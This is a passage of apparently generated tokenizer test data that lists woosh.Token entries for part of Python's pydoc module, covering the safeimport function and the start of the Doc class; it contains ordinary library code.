woosh.Token(woosh.OP, ')', 402, 74, 402, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 402, 75, 403, 0),
woosh.Token(woosh.COMMENT, "# XXX We probably don't need to pass in the loader here.", 403, 4, 403, 60),
woosh.Token(woosh.DEDENT, ' ', 404, 0, 404, 4),
woosh.Token(woosh.NAME, 'spec', 404, 4, 404, 8),
woosh.Token(woosh.OP, '=', 404, 9, 404, 10),
woosh.Token(woosh.NAME, 'importlib', 404, 11, 404, 20),
woosh.Token(woosh.OP, '.', 404, 20, 404, 21),
woosh.Token(woosh.NAME, 'util', 404, 21, 404, 25),
woosh.Token(woosh.OP, '.', 404, 25, 404, 26),
woosh.Token(woosh.NAME, 'spec_from_file_location', 404, 26, 404, 49),
woosh.Token(woosh.OP, '(', 404, 49, 404, 50),
woosh.Token(woosh.NAME, 'name', 404, 50, 404, 54),
woosh.Token(woosh.OP, ',', 404, 54, 404, 55),
woosh.Token(woosh.NAME, 'path', 404, 56, 404, 60),
woosh.Token(woosh.OP, ',', 404, 60, 404, 61),
woosh.Token(woosh.NAME, 'loader', 404, 62, 404, 68),
woosh.Token(woosh.OP, '=', 404, 68, 404, 69),
woosh.Token(woosh.NAME, 'loader', 404, 69, 404, 75),
woosh.Token(woosh.OP, ')', 404, 75, 404, 76),
woosh.Token(woosh.NEWLINE, '\r\n', 404, 76, 405, 0),
woosh.Token(woosh.NAME, 'try', 405, 4, 405, 7),
woosh.Token(woosh.OP, ':', 405, 7, 405, 8),
woosh.Token(woosh.NEWLINE, '\r\n', 405, 8, 406, 0),
woosh.Token(woosh.INDENT, ' ', 406, 0, 406, 8),
woosh.Token(woosh.NAME, 'return', 406, 8, 406, 14),
woosh.Token(woosh.NAME, 'importlib', 406, 15, 406, 24),
woosh.Token(woosh.OP, '.', 406, 24, 406, 25),
woosh.Token(woosh.NAME, '_bootstrap', 406, 25, 406, 35),
woosh.Token(woosh.OP, '.', 406, 35, 406, 36),
woosh.Token(woosh.NAME, '_load', 406, 36, 406, 41),
woosh.Token(woosh.OP, '(', 406, 41, 406, 42),
woosh.Token(woosh.NAME, 'spec', 406, 42, 406, 46),
woosh.Token(woosh.OP, ')', 406, 46, 406, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 406, 47, 407, 0),
woosh.Token(woosh.DEDENT, ' ', 407, 0, 407, 4),
woosh.Token(woosh.NAME, 'except', 407, 4, 407, 10),
woosh.Token(woosh.OP, ':', 407, 10, 407, 11),
woosh.Token(woosh.NEWLINE, '\r\n', 407, 11, 408, 0),
woosh.Token(woosh.INDENT, ' ', 408, 0, 408, 8),
woosh.Token(woosh.NAME, 'raise', 408, 8, 408, 13),
woosh.Token(woosh.NAME, 'ErrorDuringImport', 408, 14, 408, 31),
woosh.Token(woosh.OP, '(', 408, 31, 408, 32),
woosh.Token(woosh.NAME, 'path', 408, 32, 408, 36),
woosh.Token(woosh.OP, ',', 408, 36, 408, 37),
woosh.Token(woosh.NAME, 'sys', 408, 38, 408, 41),
woosh.Token(woosh.OP, '.', 408, 41, 408, 42),
woosh.Token(woosh.NAME, 'exc_info', 408, 42, 408, 50),
woosh.Token(woosh.OP, '(', 408, 50, 408, 51),
woosh.Token(woosh.OP, ')', 408, 51, 408, 52),
woosh.Token(woosh.OP, ')', 408, 52, 408, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 408, 53, 409, 0),
woosh.Token(woosh.DEDENT, '', 410, 0, 410, 0),
woosh.Token(woosh.DEDENT, '', 410, 0, 410, 0),
woosh.Token(woosh.NAME, 'def', 410, 0, 410, 3),
woosh.Token(woosh.NAME, 'safeimport', 410, 4, 410, 14),
woosh.Token(woosh.OP, '(', 410, 14, 410, 15),
woosh.Token(woosh.NAME, 'path', 410, 15, 410, 19),
woosh.Token(woosh.OP, ',', 410, 19, 410, 20),
woosh.Token(woosh.NAME, 'forceload', 410, 21, 410, 30),
woosh.Token(woosh.OP, '=', 410, 30, 410, 31),
woosh.Token(woosh.NUMBER, '0', 410, 31, 410, 32),
woosh.Token(woosh.OP, ',', 410, 32, 410, 33),
woosh.Token(woosh.NAME, 'cache', 410, 34, 410, 39),
woosh.Token(woosh.OP, '=', 410, 39, 410, 40),
woosh.Token(woosh.OP, '{', 410, 40, 410, 41),
woosh.Token(woosh.OP, '}', 410, 41, 410, 42),
woosh.Token(woosh.OP, ')', 410, 42, 410, 43),
woosh.Token(woosh.OP, ':', 410, 43, 410, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 410, 44, 411, 0),
woosh.Token(woosh.INDENT, ' ', 411, 0, 411, 4),
woosh.Token(woosh.STRING, '"""Import a module; handle errors; return None if the module isn\'t found.\r\n\r\n If the module *is* found but an exception occurs, it\'s wrapped in an\r\n ErrorDuringImport exception and reraised. Unlike __import__, if a\r\n package path is specified, the module at the end of the path is returned,\r\n not the package at the beginning. If the optional \'forceload\' argument\r\n is 1, we reload the module from disk (unless it\'s a dynamic extension)."""', 411, 4, 417, 78),
woosh.Token(woosh.NEWLINE, '\r\n', 417, 78, 418, 0),
woosh.Token(woosh.NAME, 'try', 418, 4, 418, 7),
woosh.Token(woosh.OP, ':', 418, 7, 418, 8),
woosh.Token(woosh.NEWLINE, '\r\n', 418, 8, 419, 0),
woosh.Token(woosh.COMMENT, '# If forceload is 1 and the module has been previously loaded from', 419, 8, 419, 74),
woosh.Token(woosh.COMMENT, "# disk, we always have to reload the module. Checking the file's", 420, 8, 420, 73),
woosh.Token(woosh.COMMENT, "# mtime isn't good enough (e.g. the module could contain a class", 421, 8, 421, 72),
woosh.Token(woosh.COMMENT, '# that inherits from another module that has changed).', 422, 8, 422, 62),
woosh.Token(woosh.INDENT, ' ', 423, 0, 423, 8),
woosh.Token(woosh.NAME, 'if', 423, 8, 423, 10),
woosh.Token(woosh.NAME, 'forceload', 423, 11, 423, 20),
woosh.Token(woosh.NAME, 'and', 423, 21, 423, 24),
woosh.Token(woosh.NAME, 'path', 423, 25, 423, 29),
woosh.Token(woosh.NAME, 'in', 423, 30, 423, 32),
woosh.Token(woosh.NAME, 'sys', 423, 33, 423, 36),
woosh.Token(woosh.OP, '.', 423, 36, 423, 37),
woosh.Token(woosh.NAME, 'modules', 423, 37, 423, 44),
woosh.Token(woosh.OP, ':', 423, 44, 423, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 423, 45, 424, 0),
woosh.Token(woosh.INDENT, ' ', 424, 0, 424, 12),
woosh.Token(woosh.NAME, 'if', 424, 12, 424, 14),
woosh.Token(woosh.NAME, 'path', 424, 15, 424, 19),
woosh.Token(woosh.NAME, 'not', 424, 20, 424, 23),
woosh.Token(woosh.NAME, 'in', 424, 24, 424, 26),
woosh.Token(woosh.NAME, 'sys', 424, 27, 424, 30),
woosh.Token(woosh.OP, '.', 424, 30, 424, 31),
woosh.Token(woosh.NAME, 'builtin_module_names', 424, 31, 424, 51),
woosh.Token(woosh.OP, ':', 424, 51, 424, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 424, 52, 425, 0),
woosh.Token(woosh.COMMENT, '# Remove the module from sys.modules and re-import to try', 425, 16, 425, 73),
woosh.Token(woosh.COMMENT, '# and avoid problems with partially loaded modules.', 426, 16, 426, 67),
woosh.Token(woosh.COMMENT, "# Also remove any submodules because they won't appear", 427, 16, 427, 70),
woosh.Token(woosh.COMMENT, "# in the newly loaded module's namespace if they're already", 428, 16, 428, 75),
woosh.Token(woosh.COMMENT, '# in sys.modules.', 429, 16, 429, 33),
woosh.Token(woosh.INDENT, ' ', 430, 0, 430, 16),
woosh.Token(woosh.NAME, 'subs', 430, 16, 430, 20),
woosh.Token(woosh.OP, '=', 430, 21, 430, 22),
woosh.Token(woosh.OP, '[', 430, 23, 430, 24),
woosh.Token(woosh.NAME, 'm', 430, 24, 430, 25),
woosh.Token(woosh.NAME, 'for', 430, 26, 430, 29),
woosh.Token(woosh.NAME, 'm', 430, 30, 430, 31),
woosh.Token(woosh.NAME, 'in', 430, 32, 430, 34),
woosh.Token(woosh.NAME, 'sys', 430, 35, 430, 38),
woosh.Token(woosh.OP, '.', 430, 38, 430, 39),
woosh.Token(woosh.NAME, 'modules', 430, 39, 430, 46),
woosh.Token(woosh.NAME, 'if', 430, 47, 430, 49),
woosh.Token(woosh.NAME, 'm', 430, 50, 430, 51),
woosh.Token(woosh.OP, '.', 430, 51, 430, 52),
woosh.Token(woosh.NAME, 'startswith', 430, 52, 430, 62),
woosh.Token(woosh.OP, '(', 430, 62, 430, 63),
woosh.Token(woosh.NAME, 'path', 430, 63, 430, 67),
woosh.Token(woosh.OP, '+', 430, 68, 430, 69),
woosh.Token(woosh.STRING, "'.'", 430, 70, 430, 73),
woosh.Token(woosh.OP, ')', 430, 73, 430, 74),
woosh.Token(woosh.OP, ']', 430, 74, 430, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 430, 75, 431, 0),
woosh.Token(woosh.NAME, 'for', 431, 16, 431, 19),
woosh.Token(woosh.NAME, 'key', 431, 20, 431, 23),
woosh.Token(woosh.NAME, 'in', 431, 24, 431, 26),
woosh.Token(woosh.OP, '[', 431, 27, 431, 28),
woosh.Token(woosh.NAME, 'path', 431, 28, 431, 32),
woosh.Token(woosh.OP, ']', 431, 32, 431, 33),
woosh.Token(woosh.OP, '+', 431, 34, 431, 35),
woosh.Token(woosh.NAME, 'subs', 431, 36, 431, 40),
woosh.Token(woosh.OP, ':', 431, 40, 431, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 431, 41, 432, 0),
woosh.Token(woosh.COMMENT, '# Prevent garbage collection.', 432, 20, 432, 49),
woosh.Token(woosh.INDENT, ' ', 433, 0, 433, 20),
woosh.Token(woosh.NAME, 'cache', 433, 20, 433, 25),
woosh.Token(woosh.OP, '[', 433, 25, 433, 26),
woosh.Token(woosh.NAME, 'key', 433, 26, 433, 29),
woosh.Token(woosh.OP, ']', 433, 29, 433, 30),
woosh.Token(woosh.OP, '=', 433, 31, 433, 32),
woosh.Token(woosh.NAME, 'sys', 433, 33, 433, 36),
woosh.Token(woosh.OP, '.', 433, 36, 433, 37),
woosh.Token(woosh.NAME, 'modules', 433, 37, 433, 44),
woosh.Token(woosh.OP, '[', 433, 44, 433, 45),
woosh.Token(woosh.NAME, 'key', 433, 45, 433, 48),
woosh.Token(woosh.OP, ']', 433, 48, 433, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 433, 49, 434, 0),
woosh.Token(woosh.NAME, 'del', 434, 20, 434, 23),
woosh.Token(woosh.NAME, 'sys', 434, 24, 434, 27),
woosh.Token(woosh.OP, '.', 434, 27, 434, 28),
woosh.Token(woosh.NAME, 'modules', 434, 28, 434, 35),
woosh.Token(woosh.OP, '[', 434, 35, 434, 36),
woosh.Token(woosh.NAME, 'key', 434, 36, 434, 39),
woosh.Token(woosh.OP, ']', 434, 39, 434, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 434, 40, 435, 0),
woosh.Token(woosh.DEDENT, ' ', 435, 0, 435, 8),
woosh.Token(woosh.DEDENT, '', 435, 8, 435, 8),
woosh.Token(woosh.DEDENT, '', 435, 8, 435, 8),
woosh.Token(woosh.NAME, 'module', 435, 8, 435, 14),
woosh.Token(woosh.OP, '=', 435, 15, 435, 16),
woosh.Token(woosh.NAME, '__import__', 435, 17, 435, 27),
woosh.Token(woosh.OP, '(', 435, 27, 435, 28),
woosh.Token(woosh.NAME, 'path', 435, 28, 435, 32),
woosh.Token(woosh.OP, ')', 435, 32, 435, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 435, 33, 436, 0),
woosh.Token(woosh.DEDENT, ' ', 436, 0, 436, 4),
woosh.Token(woosh.NAME, 'except', 436, 4, 436, 10),
woosh.Token(woosh.OP, ':', 436, 10, 436, 11),
woosh.Token(woosh.NEWLINE, '\r\n', 436, 11, 437, 0),
woosh.Token(woosh.COMMENT, '# Did the error occur before or after the module was found?', 437, 8, 437, 67),
woosh.Token(woosh.INDENT, ' ', 438, 0, 438, 8),
woosh.Token(woosh.OP, '(', 438, 8, 438, 9),
woosh.Token(woosh.NAME, 'exc', 438, 9, 438, 12),
woosh.Token(woosh.OP, ',', 438, 12, 438, 13),
woosh.Token(woosh.NAME, 'value', 438, 14, 438, 19),
woosh.Token(woosh.OP, ',', 438, 19, 438, 20),
woosh.Token(woosh.NAME, 'tb', 438, 21, 438, 23),
woosh.Token(woosh.OP, ')', 438, 23, 438, 24),
woosh.Token(woosh.OP, '=', 438, 25, 438, 26),
woosh.Token(woosh.NAME, 'info', 438, 27, 438, 31),
woosh.Token(woosh.OP, '=', 438, 32, 438, 33),
woosh.Token(woosh.NAME, 'sys', 438, 34, 438, 37),
woosh.Token(woosh.OP, '.', 438, 37, 438, 38),
woosh.Token(woosh.NAME, 'exc_info', 438, 38, 438, 46),
woosh.Token(woosh.OP, '(', 438, 46, 438, 47),
woosh.Token(woosh.OP, ')', 438, 47, 438, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 438, 48, 439, 0),
woosh.Token(woosh.NAME, 'if', 439, 8, 439, 10),
woosh.Token(woosh.NAME, 'path', 439, 11, 439, 15),
woosh.Token(woosh.NAME, 'in', 439, 16, 439, 18),
woosh.Token(woosh.NAME, 'sys', 439, 19, 439, 22),
woosh.Token(woosh.OP, '.', 439, 22, 439, 23),
woosh.Token(woosh.NAME, 'modules', 439, 23, 439, 30),
woosh.Token(woosh.OP, ':', 439, 30, 439, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 439, 31, 440, 0),
woosh.Token(woosh.COMMENT, '# An error occurred while executing the imported module.', 440, 12, 440, 68),
woosh.Token(woosh.INDENT, ' ', 441, 0, 441, 12),
woosh.Token(woosh.NAME, 'raise', 441, 12, 441, 17),
woosh.Token(woosh.NAME, 'ErrorDuringImport', 441, 18, 441, 35),
woosh.Token(woosh.OP, '(', 441, 35, 441, 36),
woosh.Token(woosh.NAME, 'sys', 441, 36, 441, 39),
woosh.Token(woosh.OP, '.', 441, 39, 441, 40),
woosh.Token(woosh.NAME, 'modules', 441, 40, 441, 47),
woosh.Token(woosh.OP, '[', 441, 47, 441, 48),
woosh.Token(woosh.NAME, 'path', 441, 48, 441, 52),
woosh.Token(woosh.OP, ']', 441, 52, 441, 53),
woosh.Token(woosh.OP, '.', 441, 53, 441, 54),
woosh.Token(woosh.NAME, '__file__', 441, 54, 441, 62),
woosh.Token(woosh.OP, ',', 441, 62, 441, 63),
woosh.Token(woosh.NAME, 'info', 441, 64, 441, 68),
woosh.Token(woosh.OP, ')', 441, 68, 441, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 441, 69, 442, 0),
woosh.Token(woosh.DEDENT, ' ', 442, 0, 442, 8),
woosh.Token(woosh.NAME, 'elif', 442, 8, 442, 12),
woosh.Token(woosh.NAME, 'exc', 442, 13, 442, 16),
woosh.Token(woosh.NAME, 'is', 442, 17, 442, 19),
woosh.Token(woosh.NAME, 'SyntaxError', 442, 20, 442, 31),
woosh.Token(woosh.OP, ':', 442, 31, 442, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 442, 32, 443, 0),
woosh.Token(woosh.COMMENT, '# A SyntaxError occurred before we could execute the module.', 443, 12, 443, 72),
woosh.Token(woosh.INDENT, ' ', 444, 0, 444, 12),
woosh.Token(woosh.NAME, 'raise', 444, 12, 444, 17),
woosh.Token(woosh.NAME, 'ErrorDuringImport', 444, 18, 444, 35),
woosh.Token(woosh.OP, '(', 444, 35, 444, 36),
woosh.Token(woosh.NAME, 'value', 444, 36, 444, 41),
woosh.Token(woosh.OP, '.', 444, 41, 444, 42),
woosh.Token(woosh.NAME, 'filename', 444, 42, 444, 50),
woosh.Token(woosh.OP, ',', 444, 50, 444, 51),
woosh.Token(woosh.NAME, 'info', 444, 52, 444, 56),
woosh.Token(woosh.OP, ')', 444, 56, 444, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 444, 57, 445, 0),
woosh.Token(woosh.DEDENT, ' ', 445, 0, 445, 8),
woosh.Token(woosh.NAME, 'elif', 445, 8, 445, 12),
woosh.Token(woosh.NAME, 'issubclass', 445, 13, 445, 23),
woosh.Token(woosh.OP, '(', 445, 23, 445, 24),
woosh.Token(woosh.NAME, 'exc', 445, 24, 445, 27),
woosh.Token(woosh.OP, ',', 445, 27, 445, 28),
woosh.Token(woosh.NAME, 'ImportError', 445, 29, 445, 40),
woosh.Token(woosh.OP, ')', 445, 40, 445, 41),
woosh.Token(woosh.NAME, 'and', 445, 42, 445, 45),
woosh.Token(woosh.NAME, 'value', 445, 46, 445, 51),
woosh.Token(woosh.OP, '.', 445, 51, 445, 52),
woosh.Token(woosh.NAME, 'name', 445, 52, 445, 56),
woosh.Token(woosh.OP, '==', 445, 57, 445, 59),
woosh.Token(woosh.NAME, 'path', 445, 60, 445, 64),
woosh.Token(woosh.OP, ':', 445, 64, 445, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 445, 65, 446, 0),
woosh.Token(woosh.COMMENT, '# No such module in the path.', 446, 12, 446, 41),
woosh.Token(woosh.INDENT, ' ', 447, 0, 447, 12),
woosh.Token(woosh.NAME, 'return', 447, 12, 447, 18),
woosh.Token(woosh.NAME, 'None', 447, 19, 447, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 447, 23, 448, 0),
woosh.Token(woosh.DEDENT, ' ', 448, 0, 448, 8),
woosh.Token(woosh.NAME, 'else', 448, 8, 448, 12),
woosh.Token(woosh.OP, ':', 448, 12, 448, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 448, 13, 449, 0),
woosh.Token(woosh.COMMENT, '# Some other error occurred during the importing process.', 449, 12, 449, 69),
woosh.Token(woosh.INDENT, ' ', 450, 0, 450, 12),
woosh.Token(woosh.NAME, 'raise', 450, 12, 450, 17),
woosh.Token(woosh.NAME, 'ErrorDuringImport', 450, 18, 450, 35),
woosh.Token(woosh.OP, '(', 450, 35, 450, 36),
woosh.Token(woosh.NAME, 'path', 450, 36, 450, 40),
woosh.Token(woosh.OP, ',', 450, 40, 450, 41),
woosh.Token(woosh.NAME, 'sys', 450, 42, 450, 45),
woosh.Token(woosh.OP, '.', 450, 45, 450, 46),
woosh.Token(woosh.NAME, 'exc_info', 450, 46, 450, 54),
woosh.Token(woosh.OP, '(', 450, 54, 450, 55),
woosh.Token(woosh.OP, ')', 450, 55, 450, 56),
woosh.Token(woosh.OP, ')', 450, 56, 450, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 450, 57, 451, 0),
woosh.Token(woosh.DEDENT, ' ', 451, 0, 451, 4),
woosh.Token(woosh.DEDENT, '', 451, 4, 451, 4),
woosh.Token(woosh.NAME, 'for', 451, 4, 451, 7),
woosh.Token(woosh.NAME, 'part', 451, 8, 451, 12),
woosh.Token(woosh.NAME, 'in', 451, 13, 451, 15),
woosh.Token(woosh.NAME, 'path', 451, 16, 451, 20),
woosh.Token(woosh.OP, '.', 451, 20, 451, 21),
woosh.Token(woosh.NAME, 'split', 451, 21, 451, 26),
woosh.Token(woosh.OP, '(', 451, 26, 451, 27),
woosh.Token(woosh.STRING, "'.'", 451, 27, 451, 30),
woosh.Token(woosh.OP, ')', 451, 30, 451, 31),
woosh.Token(woosh.OP, '[', 451, 31, 451, 32),
woosh.Token(woosh.NUMBER, '1', 451, 32, 451, 33),
woosh.Token(woosh.OP, ':', 451, 33, 451, 34),
woosh.Token(woosh.OP, ']', 451, 34, 451, 35),
woosh.Token(woosh.OP, ':', 451, 35, 451, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 451, 36, 452, 0),
woosh.Token(woosh.INDENT, ' ', 452, 0, 452, 8),
woosh.Token(woosh.NAME, 'try', 452, 8, 452, 11),
woosh.Token(woosh.OP, ':', 452, 11, 452, 12),
woosh.Token(woosh.NAME, 'module', 452, 13, 452, 19),
woosh.Token(woosh.OP, '=', 452, 20, 452, 21),
woosh.Token(woosh.NAME, 'getattr', 452, 22, 452, 29),
woosh.Token(woosh.OP, '(', 452, 29, 452, 30),
woosh.Token(woosh.NAME, 'module', 452, 30, 452, 36),
woosh.Token(woosh.OP, ',', 452, 36, 452, 37),
woosh.Token(woosh.NAME, 'part', 452, 38, 452, 42),
woosh.Token(woosh.OP, ')', 452, 42, 452, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 452, 43, 453, 0),
woosh.Token(woosh.NAME, 'except', 453, 8, 453, 14),
woosh.Token(woosh.NAME, 'AttributeError', 453, 15, 453, 29),
woosh.Token(woosh.OP, ':', 453, 29, 453, 30),
woosh.Token(woosh.NAME, 'return', 453, 31, 453, 37),
woosh.Token(woosh.NAME, 'None', 453, 38, 453, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 453, 42, 454, 0),
woosh.Token(woosh.DEDENT, ' ', 454, 0, 454, 4),
woosh.Token(woosh.NAME, 'return', 454, 4, 454, 10),
woosh.Token(woosh.NAME, 'module', 454, 11, 454, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 454, 17, 455, 0),
woosh.Token(woosh.COMMENT, '# ---------------------------------------------------- formatter base class', 456, 0, 456, 75),
woosh.Token(woosh.DEDENT, '', 458, 0, 458, 0),
woosh.Token(woosh.NAME, 'class', 458, 0, 458, 5),
woosh.Token(woosh.NAME, 'Doc', 458, 6, 458, 9),
woosh.Token(woosh.OP, ':', 458, 9, 458, 10),
woosh.Token(woosh.NEWLINE, '\r\n', 458, 10, 459, 0),
woosh.Token(woosh.INDENT, ' ', 460, 0, 460, 4),
woosh.Token(woosh.NAME, 'PYTHONDOCS', 460, 4, 460, 14),
woosh.Token(woosh.OP, '=', 460, 15, 460, 16),
woosh.Token(woosh.NAME, 'os', 460, 17, 460, 19),
woosh.Token(woosh.OP, '.', 460, 19, 460, 20),
woosh.Token(woosh.NAME, 'environ', 460, 20, 460, 27),
woosh.Token(woosh.OP, '.', 460, 27, 460, 28),
woosh.Token(woosh.NAME, 'get', 460, 28, 460, 31),
woosh.Token(woosh.OP, '(', 460, 31, 460, 32),
woosh.Token(woosh.STRING, '"PYTHONDOCS"', 460, 32, 460, 44),
woosh.Token(woosh.OP, ',', 460, 44, 460, 45),
woosh.Token(woosh.STRING, '"https://docs.python.org/%d.%d/library"', 461, 32, 461, 71),
woosh.Token(woosh.OP, '%', 462, 32, 462, 33),
woosh.Token(woosh.NAME, 'sys', 462, 34, 462, 37),
woosh.Token(woosh.OP, '.', 462, 37, 462, 38),
woosh.Token(woosh.NAME, 'version_info', 462, 38, 462, 50),
woosh.Token(woosh.OP, '[', 462, 50, 462, 51),
woosh.Token(woosh.OP, ':', 462, 51, 462, 52),
woosh.Token(woosh.NUMBER, '2', 462, 52, 462, 53),
woosh.Token(woosh.OP, ']', 462, 53, 462, 54),
woosh.Token(woosh.OP, ')', 462, 54, 462, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 462, 55, 463, 0),
woosh.Token(woosh.NAME, 'def', 464, 4, 464, 7),
woosh.Token(woosh.NAME, 'document', 464, 8, 464, 16),
woosh.Token(woosh.OP, '(', 464, 16, 464, 17),
woosh.Token(woosh.NAME, 'self', 464, 17, 464, 21),
woosh.Token(woosh.OP, ',', 464, 21, 464, 22),
woosh.Token(woosh.NAME, 'object', 464, 23, 464, 29),
woosh.Token(woosh.OP, ',', 464, 29, 464, 30),
woosh.Token(woosh.NAME, 'name', 464, 31, 464, 35),
woosh.Token(woosh.OP, '=', 464, 35, 464, 36),
woosh.Token(woosh.NAME, 'None', 464, 36, 464, 40),
woosh.Token(woosh.OP, ',', 464, 40, 464, 41),
woosh.Token(woosh.OP, '*', 464, 42, 464, 43),
woosh.Token(woosh.NAME, 'args', 464, 43, 464, 47),
woosh.Token(woosh.OP, ')', 464, 47, 464, 48),
woosh.Token(woosh.OP, ':', 464, 48, 464, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 464, 49, 465, 0),
woosh.Token(woosh.INDENT, ' ', 465, 0, 465, 8),
woosh.Token(woosh.STRING, '"""Generate documentation for an object."""', 465, 8, 465, 51),
woosh.Token(woosh.NEWLINE, '\r\n', 465, 51, 466, 0),
woosh.Token(woosh.NAME, 'args', 466, 8, 466, 12),
woosh.Token(woosh.OP, '=', 466, 13, 466, 14),
woosh.Token(woosh.OP, '(', 466, 15, 466, 16),
woosh.Token(woosh.NAME, 'object', 466, 16, 466, 22),
woosh.Token(woosh.OP, ',', 466, 22, 466, 23),
woosh.Token(woosh.NAME, 'name', 466, 24, 466, 28),
woosh.Token(woosh.OP, ')', 466, 28, 466, 29),
woosh.Token(woosh.OP, '+', 466, 30, 466, 31),
woosh.Token(woosh.NAME, 'args', 466, 32, 466, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 466, 36, 467, 0),
woosh.Token(woosh.COMMENT, "# 'try' clause is to attempt to handle the possibility that inspect", 467, 8, 467, 75),
woosh.Token(woosh.COMMENT, '# identifies something in a way that pydoc itself has issues handling;', 468, 8, 468, 78),
woosh.Token(woosh.COMMENT, "# think 'super' and how it is a descriptor (which raises the exception", 469, 8, 469, 78),
woosh.Token(woosh.COMMENT, '# by lacking a __name__ attribute) and an instance.', 470, 8, 470, 59),
woosh.Token(woosh.NAME, 'try', 471, 8, 471, 11),
woosh.Token(woosh.OP, ':', 471, 11, 471, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 471, 12, 472, 0),
woosh.Token(woosh.INDENT, ' ', 472, 0, 472, 12),
woosh.Token(woosh.NAME, 'if', 472, 12, 472, 14),
woosh.Token(woosh.NAME, 'inspect', 472, 15, 472, 22),
woosh.Token(woosh.OP, '.', 472, 22, 472, 23),
woosh.Token(woosh.NAME, 'ismodule', 472, 23, 472, 31),
woosh.Token(woosh.OP, '(', 472, 31, 472, 32),
woosh.Token(woosh.NAME, 'object', 472, 32, 472, 38),
woosh.Token(woosh.OP, ')', 472, 38, 472, 39),
woosh.Token(woosh.OP, ':', 472, 39, 472, 40),
woosh.Token(woosh.NAME, 'return', 472, 41, 472, 47),
woosh.Token(woosh.NAME, 'self', 472, 48, 472, 52),
woosh.Token(woosh.OP, '.', 472, 52, 472, 53),
woosh.Token(woosh.NAME, 'docmodule', 472, 53, 472, 62),
woosh.Token(woosh.OP, '(', 472, 62, 472, 63),
woosh.Token(woosh.OP, '*', 472, 63, 472, 64),
woosh.Token(woosh.NAME, 'args', 472, 64, 472, 68),
woosh.Token(woosh.OP, ')', 472, 68, 472, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 472, 69, 473, 0),
woosh.Token(woosh.NAME, 'if', 473, 12, 473, 14),
woosh.Token(woosh.NAME, 'inspect', 473, 15, 473, 22),
woosh.Token(woosh.OP, '.', 473, 22, 473, 23),
woosh.Token(woosh.NAME, 'isclass', 473, 23, 473, 30),
woosh.Token(woosh.OP, '(', 473, 30, 473, 31),
woosh.Token(woosh.NAME, 'object', 473, 31, 473, 37),
woosh.Token(woosh.OP, ')', 473, 37, 473, 38),
woosh.Token(woosh.OP, ':', 473, 38, 473, 39),
woosh.Token(woosh.NAME, 'return', 473, 40, 473, 46),
woosh.Token(woosh.NAME, 'self', 473, 47, 473, 51),
woosh.Token(woosh.OP, '.', 473, 51, 473, 52),
woosh.Token(woosh.NAME, 'docclass', 473, 52, 473, 60),
woosh.Token(woosh.OP, '(', 473, 60, 473, 61),
woosh.Token(woosh.OP, '*', 473, 61, 473, 62),
woosh.Token(woosh.NAME, 'args', 473, 62, 473, 66),
woosh.Token(woosh.OP, ')', 473, 66, 473, 67),
woosh.Token(woosh.NEWLINE, '\r\n', 473, 67, 474, 0),
woosh.Token(woosh.NAME, 'if', 474, 12, 474, 14),
woosh.Token(woosh.NAME, 'inspect', 474, 15, 474, 22),
woosh.Token(woosh.OP, '.', 474, 22, 474, 23),
woosh.Token(woosh.NAME, 'isroutine', 474, 23, 474, 32),
woosh.Token(woosh.OP, '(', 474, 32, 474, 33),
woosh.Token(woosh.NAME, 'object', 474, 33, 474, 39),
woosh.Token(woosh.OP, ')', 474, 39, 474, 40),
woosh.Token(woosh.OP, ':', 474, 40, 474, 41),
woosh.Token(woosh.NAME, 'return', 474, 42, 474, 48),
woosh.Token(woosh.NAME, 'self', 474, 49, 474, 53),
woosh.Token(woosh.OP, '.', 474, 53, 474, 54),
woosh.Token(woosh.NAME, 'docroutine', 474, 54, 474, 64),
woosh.Token(woosh.OP, '(', 474, 64, 474, 65),
woosh.Token(woosh.OP, '*', 474, 65, 474, 66),
woosh.Token(woosh.NAME, 'args', 474, 66, 474, 70),
woosh.Token(woosh.OP, ')', 474, 70, 474, 71),
woosh.Token(woosh.NEWLINE, '\r\n', 474, 71, 475, 0),
woosh.Token(woosh.DEDENT, ' ', 475, 0, 475, 8),
woosh.Token(woosh.NAME, 'except', 475, 8, 475, 14),
woosh.Token(woosh.NAME, 'AttributeError', 475, 15, 475, 29),
woosh.Token(woosh.OP, ':', 475, 29, 475, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 475, 30, 476, 0),
woosh.Token(woosh.INDENT, ' ', 476, 0, 476, 12),
woosh.Token(woosh.NAME, 'pass', 476, 12, 476, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 476, 16, 477, 0),
woosh.Token(woosh.DEDENT, ' ', 477, 0, 477, 8),
woosh.Token(woosh.NAME, 'if', 477, 8, 477, 10),
woosh.Token(woosh.NAME, 'inspect', 477, 11, 477, 18),
woosh.Token(woosh.OP, '.', 477, 18, 477, 19),
woosh.Token(woosh.NAME, 'isdatadescriptor', 477, 19, 477, 35),
woosh.Token(woosh.OP, '(', 477, 35, 477, 36),
woosh.Token(woosh.NAME, 'object', 477, 36, 477, 42),
woosh.Token(woosh.OP, ')', 477, 42, 477, 43),
woosh.Token(woosh.OP, ':', 477, 43, 477, 44),
woosh.Token(woosh.NAME, 'return', 477, 45, 477, 51),
